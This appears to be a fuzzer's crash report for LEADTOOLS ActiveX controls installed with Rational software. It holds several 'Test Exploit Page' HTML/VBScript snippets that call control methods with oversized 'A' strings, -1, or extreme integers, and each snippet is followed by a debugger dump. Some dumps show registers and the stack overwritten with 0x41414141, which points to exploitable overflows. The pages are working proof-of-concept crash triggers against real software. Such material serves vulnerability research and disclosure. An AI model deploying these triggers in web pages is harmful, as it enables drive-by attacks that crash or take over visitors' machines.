=====================================
<html>
Test Exploit Page
<object classid='clsid:00110060-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Rational\common\ltdlg11n.ocx"
prototype  = "Function GetColorRes ( ByVal hWnd As Long ) As Integer"
memberName = "GetColorRes"
progid     = "LEADDlgLib.LEADDlg"
argCount   = 1
 
arg1=-1
 
target.GetColorRes arg1
 
</script>
 
 
Exception Code: ACCESS_VIOLATION
Disasm: 7E428FB5    MOV [EAX],ECX
 
Seh Chain:
--------------------------------------------------
1   73352960    VBSCRIPT.dll
2   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
USER32.7E428FB5               LTKRN11n.2000A033            
 
 
Registers:
--------------------------------------------------
EIP 7E428FB5 -> 8B044689
EAX 7713643C -> 8B044689
EBX 00000000
ECX 00000000
EDX 00000001
EDI 02AB1FE0 -> 00000000
ESI 771363F8 -> F33BF08B
EBP 0013EC60 -> 00000000
ESP 0013EC60 -> 00000000
 
 
Block Disassembly:
--------------------------------------------------
7E428FA8    PUSH EBP
7E428FA9    MOV EBP,ESP
7E428FAB    MOV EAX,[EBP+8]
7E428FAE    TEST EAX,EAX
7E428FB0    JE SHORT 7E428FCC
7E428FB2    MOV ECX,[EBP+C]
7E428FB5    MOV [EAX],ECX     <--- CRASH
7E428FB7    MOV ECX,[EBP+10]
7E428FBA    MOV [EAX+4],ECX
7E428FBD    MOV ECX,[EBP+14]
7E428FC0    MOV [EAX+8],ECX
7E428FC3    MOV ECX,[EBP+18]
7E428FC6    MOV [EAX+C],ECX
7E428FC9    XOR EAX,EAX
7E428FCB    INC EAX
 
 
ArgDump:
--------------------------------------------------
EBP+8   7713643C -> 8B044689
EBP+12  00000000
EBP+16  00000000
EBP+20  00000000
EBP+24  00000000
EBP+28  02AB1FE0 -> 00000000
 
 
Stack Dump:
--------------------------------------------------
13EC60 00 00 00 00 33 A0 00 20 3C 64 13 77 00 00 00 00  [.........d.w....]
13EC70 00 00 00 00 00 00 00 00 00 00 00 00 E0 1F AB 02  [................]
13EC80 D4 EC 13 00 20 1A FF 1F F8 63 13 77 E0 1F AB 02  [.........c.w....]
13EC90 B4 ED 13 00 3A 11 BE 1F D4 EC 13 00 AC ED 13 00  [................]
13ECA0 E0 1F AB 02 58 1F AB 02 F8 1E AB 02 00 00 00 00  [....X...........]
 
 
 
ApiLog
--------------------------------------------------
 
***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)

=====================================
<html>
Test Exploit Page
<object classid='clsid:00110060-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Rational\common\ltdlg11n.ocx"
prototype  = "Property Let Bitmap As Long"
memberName = "Bitmap"
progid     = "LEADDlgLib.LEADDlg"
argCount   = 1
 
arg1=-1
 
target.Bitmap = arg1
 
</script>
 
 
Exception Code: ACCESS_VIOLATION
Disasm: AA62D2  CMP DWORD PTR [EAX],6461656C
 
Seh Chain:
--------------------------------------------------
1   73352960    VBSCRIPT.dll
2   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
 
 
Registers:
--------------------------------------------------
EIP 00AA62D2
EAX 00000000
EBX 7C80FF22 -> A868146A
ECX 02AB2128 -> 00000000
EDX 00150608 -> 7C97E5A0
EDI 02AB2128 -> 00000000
ESI 02AB1F58 -> 00AB07C0
EBP FFFFFFFF
ESP 0013ED98 -> 00AA6292
 
 
Block Disassembly:
--------------------------------------------------
AA62BE  POP EBX
AA62BF  RETN 8
AA62C2  PUSH DWORD PTR [ESP+4]
AA62C6  CALL [AB00EC]
AA62CC  MOV ECX,[ESP+8]
AA62D0  MOV [ECX],EAX
AA62D2  CMP DWORD PTR [EAX],6461656C      <--- CRASH
AA62D8  JE SHORT 00AA62DF
AA62DA  AND DWORD PTR [ECX],0
AA62DD  JMP SHORT 00AA62E2
AA62DF  MOV EAX,[EAX+8]
AA62E2  RETN 8
AA62E5  PUSH ESI
AA62E6  MOV ESI,[ESP+8]
AA62EA  LEA ECX,[ESI-60]
 
 
Stack Dump:
--------------------------------------------------
13ED98 92 62 AA 00 FF FF FF FF 28 21 AB 02 00 00 00 00  [.b..............]
13EDA8 AC 60 1A 00 CC ED 13 00 C0 07 AB 00 D9 5C 13 77  [.`...........\.w]
13EDB8 58 1F AB 02 FF FF FF FF 00 EE 13 00 B0 A0 B1 02  [X...............]
13EDC8 C0 ED 13 00 5C EE 13 00 E8 62 13 77 58 1F AB 02  [....\....b.wX...]
13EDD8 60 00 00 00 04 00 00 00 0A 00 00 00 01 00 00 00  [`...............]
 
 
 
ApiLog
--------------------------------------------------
 
***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)


=====================================
<html>
Test Exploit Page
<object classid='clsid:00110200-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Rational\common\lttmb11n.ocx"
prototype  = "Function BrowseDir ( ByVal pszDirectory As String ) As Integer"
memberName = "BrowseDir"
progid     = "LEADThumbLib.LEADThumb"
argCount   = 1
 
arg1=String(4116, "A")
 
target.BrowseDir arg1
 
</script>
 
 
Exception Code: ACCESS_VIOLATION
Disasm: 7C80BE74    MOV CL,[EAX]
 
Seh Chain:
--------------------------------------------------
1   7C839AD8    KERNEL32.dll
2   73352960    VBSCRIPT.dll
3   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
KERNEL32.7C80BE74             LTTMB11n.AC1153              
LTTMB11n.AC1153               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             lttmb11n.AA6E11              
lttmb11n.AA6E11               lttmb11n.AA27C9              
lttmb11n.AA27C9               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.7330409F            
VBSCRIPT.7330409F             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 7C80BE74
EAX 41414141
EBX 00000000
ECX 41414141
EDX 41414142
EDI 00AA46E9 -> 8BEC8B55
ESI FFFFFFF6
EBP 0013C560 -> 0013EDAC
ESP 0013C53C -> 00AA46E9
 
 
Block Disassembly:
--------------------------------------------------
7C80BE5D    CALL 7C8024D6
7C80BE62    MOV EAX,[EBP+8]
7C80BE65    TEST EAX,EAX
7C80BE67    JE 7C836665
7C80BE6D    AND DWORD PTR [EBP-4],0
7C80BE71    LEA EDX,[EAX+1]
7C80BE74    MOV CL,[EAX]      <--- CRASH
7C80BE76    INC EAX
7C80BE77    TEST CL,CL
7C80BE79    JNZ SHORT 7C80BE74
7C80BE7B    SUB EAX,EDX
7C80BE7D    OR DWORD PTR [EBP-4],FFFFFFFF
7C80BE81    CALL 7C802511
7C80BE86    RETN 4
7C80BE89    NOP
 
 
ArgDump:
--------------------------------------------------
EBP+8   41414141
EBP+12  0013EDAC -> 0013EDCC
EBP+16  00000008
EBP+20  02231F58 -> 00AAA628
EBP+24  0013CD70 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+28  00000000
 
 
Stack Dump:
--------------------------------------------------
13C53C E9 46 AA 00 F6 FF FF FF 00 00 00 00 3C C5 13 00  [.F..............]
13C54C AC F1 13 00 AC F1 13 00 D8 9A 83 7C 90 BE 80 7C  [................]
13C55C 00 00 00 00 AC ED 13 00 53 11 AC 00 41 41 41 41  [........S.......]
13C56C AC ED 13 00 08 00 00 00 58 1F 23 02 70 CD 13 00  [........X...p...]
13C57C 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00  [................]
 
 
 
Exception Code: ACCESS_VIOLATION
Disasm: AC115A  CMP BYTE PTR [ECX+EAX-1],5C
 
Seh Chain:
--------------------------------------------------
1   73352960    VBSCRIPT.dll
2   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
LTTMB11n.AC115A               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             lttmb11n.AA6E11              
lttmb11n.AA6E11               lttmb11n.AA27C9              
lttmb11n.AA27C9               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.7330409F            
VBSCRIPT.7330409F             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 00AC115A
EAX 00000000
EBX 00000000
ECX 41414141
EDX 00000000
EDI 00AA46E9 -> 8BEC8B55
ESI FFFFFFF6
EBP 0013EDAC -> 0013EDCC
ESP 0013C56C -> 0013EDAC
 
 
Block Disassembly:
--------------------------------------------------
AC113E  PUSH EAX
AC113F  CALL [ACE1B0]
AC1145  MOV ECX,[ESP+7B4]
AC114C  PUSH ECX
AC114D  CALL [ACE1AC]
AC1153  MOV ECX,[ESP+7B4]
AC115A  CMP BYTE PTR [ECX+EAX-1],5C   <--- CRASH
AC115F  JE SHORT 00AC1171
AC1161  LEA EAX,[ESP+68]
AC1165  PUSH ACA03C
AC116A  PUSH EAX
AC116B  CALL [ACE1A8]
AC1171  MOV EAX,[ESP+7B8]
AC1178  LEA ECX,[ESP+68]
AC117C  PUSH EAX
 
 
ArgDump:
--------------------------------------------------
EBP+8   02231F58 -> 00AAA628
EBP+12  00184934 -> Uni: AAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16  0013EE10 -> 00000000
EBP+20  0013EE00 -> 00130000
EBP+24  02281A50 -> 00000038
EBP+28  0013EDC0 -> 0013EE00
 
 
Stack Dump:
--------------------------------------------------
13C56C AC ED 13 00 08 00 00 00 58 1F 23 02 70 CD 13 00  [........X...p...]
13C57C 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00  [................]
13C58C 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
13C59C 1C 00 00 00 96 00 00 00 96 00 00 00 00 02 00 00  [................]
13C5AC 00 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00  [................]
 
 
 
ApiLog
--------------------------------------------------
 
***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)

=====================================
<html>
Test Exploit Page
 
<object classid='clsid:00110100-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
targetFile = "C:\Program Files\Rational\common\ltlst11n.ocx"
prototype  = "Function Insert ( ByVal Bitmap As Long ,  ByVal pszText As String ,  ByVal Data As Long ) As Integer"
memberName = "Insert"
progid     = "LEADImgListLib.LEADImgList"
argCount   = 3
 
arg1=1
arg2="defaultV"
arg3=-2147483647
 
target.Insert arg1 ,arg2 ,arg3
 
</script>
 
Exception Code: ACCESS_VIOLATION
Disasm: 7C809EDA    MOV AL,[EDX]
 
Seh Chain:
--------------------------------------------------
1   7C839AD8    KERNEL32.dll
2   7C839AD8    KERNEL32.dll
3   73352960    VBSCRIPT.dll
4   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
KERNEL32.7C809EDA             KERNEL32.7C834E80            
KERNEL32.7C834E80             ltlst11n.AA1104              
ltlst11n.AA1104               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             ltlst11n.AAAAB2              
ltlst11n.AAAAB2               ltlst11n.AA45C5              
ltlst11n.AA45C5               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.7330409F            
VBSCRIPT.7330409F             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 7C809EDA
EAX 00000001
EBX 00000001
ECX 02650B60 -> 00AB7948
EDX 00000001
EDI 00000001
ESI 00001000
EBP 0013ED20 -> 0013ED60
ESP 0013ECF4 -> 00000000
 
 
Block Disassembly:
--------------------------------------------------
7C809EC2    TEST EDX,EDX
7C809EC4    JE 7C80BFD0
7C809ECA    LEA EDI,[EDX+EAX-1]
7C809ECE    CMP EDI,EDX
7C809ED0    JB 7C80BFD0
7C809ED6    AND DWORD PTR [EBP-4],0
7C809EDA    MOV AL,[EDX]      <--- CRASH
7C809EDC    LEA EAX,[ESI-1]
7C809EDF    NOT EAX
7C809EE1    MOV ECX,EAX
7C809EE3    AND ECX,EDX
7C809EE5    MOV [EBP-1C],ECX
7C809EE8    AND EAX,EDI
7C809EEA    MOV [EBP-20],EAX
7C809EED    CMP ECX,EAX
 
 
ArgDump:
--------------------------------------------------
EBP+8   00000001
EBP+12  00000001
EBP+16  00000000
EBP+20  02650BC0 -> 00AB77F0
EBP+24  00000000
EBP+28  0013EDB4 -> 00181884
 
 
Stack Dump:
--------------------------------------------------
13ECF4 00 00 00 00 C0 0B 65 02 01 00 00 00 02 00 00 00  [......e.........]
13ED04 03 00 00 00 F4 EC 13 00 D0 97 53 00 50 ED 13 00  [..........S.P...]
13ED14 D8 9A 83 7C 08 9F 80 7C 00 00 00 00 60 ED 13 00  [............`...]
13ED24 80 4E 83 7C 01 00 00 00 01 00 00 00 00 00 00 00  [.N..............]
13ED34 C0 0B 65 02 00 00 00 00 B4 ED 13 00 A0 ED 13 00  [..e.............]
 
 
 
Exception Code: ACCESS_VIOLATION
Disasm: AA110A  CMP DWORD PTR [EAX],6461656C
 
Seh Chain:
--------------------------------------------------
1   73352960    VBSCRIPT.dll
2   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
ltlst11n.AA110A               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             ltlst11n.AAAAB2              
ltlst11n.AAAAB2               ltlst11n.AA45C5              
ltlst11n.AA45C5               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.7330409F            
VBSCRIPT.7330409F             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 00AA110A
EAX 00000000
EBX 00000000
ECX 0013EDA0 -> 00000000
EDX 00000000
EDI 00000000
ESI 02650BC0 -> 00AB77F0
EBP 0013EDA4 -> 0013EDCC
ESP 0013ED6C -> 00AA8B02
 
 
Block Disassembly:
--------------------------------------------------
AA10F6  LEAVE
AA10F7  RETN 8
AA10FA  PUSH DWORD PTR [ESP+4]
AA10FE  CALL [AB7164]
AA1104  MOV ECX,[ESP+8]
AA1108  MOV [ECX],EAX
AA110A  CMP DWORD PTR [EAX],6461656C      <--- CRASH
AA1110  JE SHORT 00AA1117
AA1112  AND DWORD PTR [ECX],0
AA1115  JMP SHORT 00AA111A
AA1117  MOV EAX,[EAX+8]
AA111A  RETN 8
AA111D  PUSH EBP
AA111E  MOV EBP,ESP
AA1120  SUB ESP,20
 
 
ArgDump:
--------------------------------------------------
EBP+8   02650BC0 -> 00AB77F0
EBP+12  00000001
EBP+16  00181884 -> Uni: defaultV
EBP+20  80000001
EBP+24  0013EE10 -> 00000000
EBP+28  0013EE00 -> 00130000
 
 
Stack Dump:
--------------------------------------------------
13ED6C 02 8B AA 00 01 00 00 00 A0 ED 13 00 00 00 00 00  [................]
13ED7C B4 32 18 00 F0 77 AB 00 04 00 00 00 03 00 00 00  [.....w..........]
13ED8C 30 F0 13 00 7C 52 A5 02 00 00 00 00 FF FF FF FF  [.....R..........]
13ED9C 00 00 00 00 00 00 00 00 CC ED 13 00 D9 5C 13 77  [.............\.w]
13EDAC C0 0B 65 02 01 00 00 00 84 18 18 00 01 00 00 80  [..e.............]
 
 
 
ApiLog
--------------------------------------------------
 
***** Installing Hooks *****
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)
7c821a94     CreateFileA(C:\WINDOWS\system32\rsaenh.dll)


=====================================
<html>
Test Exploit Page
<object classid='clsid:00110050-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /></object>
<script language='vbscript'>
 
targetFile = "C:\Program Files\Rational\common\ltisi11n.ocx"
prototype  = "Property Let DriverName As String"
memberName = "DriverName"
progid     = "LEADISISLib.LEADISIS"
argCount   = 1
 
arg1=String(65535, "A")
 
target.DriverName = arg1
 
</script>
 
 
Exception Code: ACCESS_VIOLATION
Disasm: 7C80BEB9    MOV [EDX],AL
 
Seh Chain:
--------------------------------------------------
1   7C839AD8    KERNEL32.dll
2   73352960    VBSCRIPT.dll
3   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
KERNEL32.7C80BEB9             ltisi11n.AA1537              
ltisi11n.AA1537               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             ltisi11n.AA64D7              
ltisi11n.AA64D7               ltisi11n.AA319B              
ltisi11n.AA319B               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.73311302            
VBSCRIPT.73311302             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 7C80BEB9 -> AD0013ED
EAX 0013BD41 -> AD0013ED
EBX 00AAA760 -> 00AA408F
ECX 0013CDA4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EDX 02A73000
EDI 0000302A
ESI 02A71F58 -> 00AAA760
EBP 0013BD6C -> 0013EDB0
ESP 0013BD48 -> 0000302A -> Uni: *0*0
 
 
Block Disassembly:
--------------------------------------------------
7C80BEA3    PUSH 7C80BED0
7C80BEA8    CALL 7C8024D6
7C80BEAD    AND DWORD PTR [EBP-4],0
7C80BEB1    MOV ECX,[EBP+C]
7C80BEB4    MOV EDX,[EBP+8]
7C80BEB7    MOV AL,[ECX]
7C80BEB9    MOV [EDX],AL      <--- CRASH
7C80BEBB    INC ECX
7C80BEBC    INC EDX
7C80BEBD    TEST AL,AL
7C80BEBF    JNZ SHORT 7C80BEB7
7C80BEC1    OR DWORD PTR [EBP-4],FFFFFFFF
7C80BEC5    MOV EAX,[EBP+8]
7C80BEC8    CALL 7C802511
7C80BECD    RETN 8
 
 
ArgDump:
--------------------------------------------------
EBP+8   02A71FD8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+12  0013BD7C -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP+16  41414141
EBP+20  41414141
EBP+24  41414141
EBP+28  41414141
 
 
Stack Dump:
--------------------------------------------------
13BD48 2A 30 00 00 58 1F A7 02 60 A7 AA 00 48 BD 13 00  [....X...`...H...]
13BD58 7C BD 13 00 AC F1 13 00 D8 9A 83 7C D0 BE 80 7C  [................]
13BD68 00 00 00 00 B0 ED 13 00 37 15 AA 00 D8 1F A7 02  [................]
13BD78 7C BD 13 00 41 41 41 41 41 41 41 41 41 41 41 41  [................]
13BD88 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41  [................]
 
 
 
Exception Code: ACCESS_VIOLATION
Disasm: 7C919084    MOV ECX,[EBX]
 
Seh Chain:
--------------------------------------------------
1   7C90E920    ntdll.dll
2   7C90E920    ntdll.dll
3   7C90E920    ntdll.dll
4   7C90E920    ntdll.dll
5   73352960    VBSCRIPT.dll
6   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
ntdll.7C919084                ntdll.7C96EEA0               
ntdll.7C96EEA0                ntdll.7C94B394               
ntdll.7C94B394                ntdll.7C918F21               
ntdll.7C918F21                ltisi11n.AA69BC              
ltisi11n.AA69BC               ltisi11n.AA7189              
ltisi11n.AA7189               ltisi11n.AA154C              
ltisi11n.AA154C               OLEAUT32.77135CD9            
OLEAUT32.77135CD9             OLEAUT32.771362E8            
OLEAUT32.771362E8             ltisi11n.AA64D7              
ltisi11n.AA64D7               ltisi11n.AA319B              
ltisi11n.AA319B               VBSCRIPT.73303EB7            
VBSCRIPT.73303EB7             VBSCRIPT.73303E27            
VBSCRIPT.73303E27             VBSCRIPT.73303397            
VBSCRIPT.73303397             VBSCRIPT.73303D88            
VBSCRIPT.73303D88             VBSCRIPT.73311302            
VBSCRIPT.73311302             VBSCRIPT.733063EE            
VBSCRIPT.733063EE             VBSCRIPT.73306373            
VBSCRIPT.73306373             VBSCRIPT.73306BA5            
VBSCRIPT.73306BA5             VBSCRIPT.73306D9D            
VBSCRIPT.73306D9D             VBSCRIPT.73305103            
VBSCRIPT.73305103             SCROBJ.5CE44396              
SCROBJ.5CE44396               SCROBJ.5CE4480B              
SCROBJ.5CE4480B               SCROBJ.5CE446A6              
SCROBJ.5CE446A6               SCROBJ.5CE44643              
SCROBJ.5CE44643               SCROBJ.5CE44608              
SCROBJ.5CE44608               1013C93                      
1013C93                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 7C919084 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EAX 02A72100 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBX 41414141
ECX 00004141
EDX 02A70168 -> 00000000
EDI 41414141
ESI 02A720F8 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
EBP 0013B824 -> 0013B8A8
ESP 0013B608 -> 0000001C
 
 
Block Disassembly:
--------------------------------------------------
7C91906D    MOV [EBP-25],AL
7C919070    LEA EAX,[ESI+8]
7C919073    MOV EDI,[EAX]
7C919075    MOV [EBP-1E4],EDI
7C91907B    MOV EBX,[ESI+C]
7C91907E    MOV [EBP-164],EBX
7C919084    MOV ECX,[EBX]     <--- CRASH
7C919086    CMP ECX,[EDI+4]
7C919089    JNZ 7C92CC59
7C91908F    CMP ECX,EAX
7C919091    JNZ 7C92CC59
7C919097    PUSH ESI
7C919098    PUSH DWORD PTR [EBP-1C]
7C91909B    CALL 7C910684
7C9190A0    MOV [EBX],EDI
 
 
ArgDump:
--------------------------------------------------
EBP+8   02A70000 -> 000000C8
EBP+12  50000161
EBP+16  0000001C
EBP+20  02A70000 -> 000000C8
EBP+24  00000000
EBP+28  02A70000 -> 000000C8
 
 
Stack Dump:
--------------------------------------------------
13B608 1C 00 00 00 00 00 A7 02 01 00 00 00 00 00 00 00  [................]
13B618 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
13B628 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00  [................]
13B638 00 00 00 00 00 00 00 00 41 41 41 41 00 00 00 00  [................]
13B648 00 00 00 00 00 00 00 00 00 60 13 00 00 00 14 00  [.........`......]
 
 
 
Exception Code: BREAKPOINT
Disasm: 7C90120E    INT3
 
Seh Chain:
--------------------------------------------------
1   7C90E920    ntdll.dll
2   7C90E920    ntdll.dll
3   7C90E920    ntdll.dll
4   7C839AD8    KERNEL32.dll
 
 
Called From                   Returns To                   
--------------------------------------------------
ntdll.7C90120F                ntdll.7C95F38C               
ntdll.7C95F38C                ntdll.7C96E507               
ntdll.7C96E507                ntdll.7C96F75E               
ntdll.7C96F75E                ntdll.7C94BC4C               
ntdll.7C94BC4C                ntdll.7C927573               
ntdll.7C927573                ltisi11n.AA69F4              
ltisi11n.AA69F4               VBSCRIPT.733015F2            
VBSCRIPT.733015F2             VBSCRIPT.7331EEE1            
VBSCRIPT.7331EEE1             VBSCRIPT.7331F192            
VBSCRIPT.7331F192             VBSCRIPT.7331F632            
VBSCRIPT.7331F632             VBSCRIPT.73321CB3            
VBSCRIPT.73321CB3             SCROBJ.5CE448DD              
SCROBJ.5CE448DD               SCROBJ.5CE49EEA              
SCROBJ.5CE49EEA               SCROBJ.5CE49E41              
SCROBJ.5CE49E41               1013CE7                      
1013CE7                       1006B0C                      
1006B0C                       100332C                      
100332C                       1003105                      
1003105                       1003076                      
1003076                       1002F16                      
1002F16                       KERNEL32.7C817077            
 
 
Registers:
--------------------------------------------------
EIP 7C90120F -> 000B0041
EAX 02A71EF0 -> 000B0041
EBX 02A720E4 -> Asc: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ECX 7C91EAD5 -> FF0014C2
EDX 0013EECE -> EEF4000A
EDI 000001EC
ESI 02A71EF0 -> 000B0041
EBP 0013F0D4 -> 0013F0EC
ESP 0013F0D0 -> 7C96E139
 
 
Block Disassembly:
--------------------------------------------------
7C9011FF    TEST BYTE PTR [ESI+10],10
7C901203    JE 7C90FEF6
7C901209    POP ESI
7C90120A    LEAVE
7C90120B    RETN 4
7C90120E    INT3
7C90120F    RETN      <--- CRASH
7C901210    MOV EDI,EDI
7C901212    INT3
7C901213    RETN
7C901214    MOV EDI,EDI
7C901216    MOV EAX,[ESP+4]
7C90121A    INT3
7C90121B    RETN 4
7C90121E    MOV EAX,FS:[18]
 
 
ArgDump:
--------------------------------------------------
EBP+8   02A71EF0 -> 000B0041
EBP+12  02A71EF0 -> 000B0041
EBP+16  02A70000 -> 000000C8
EBP+20  02A71EF0 -> 000B0041
EBP+24  0013F100 -> 0013F174
EBP+28  7C96E507 -> 3374C084
 
 
Stack Dump:
--------------------------------------------------
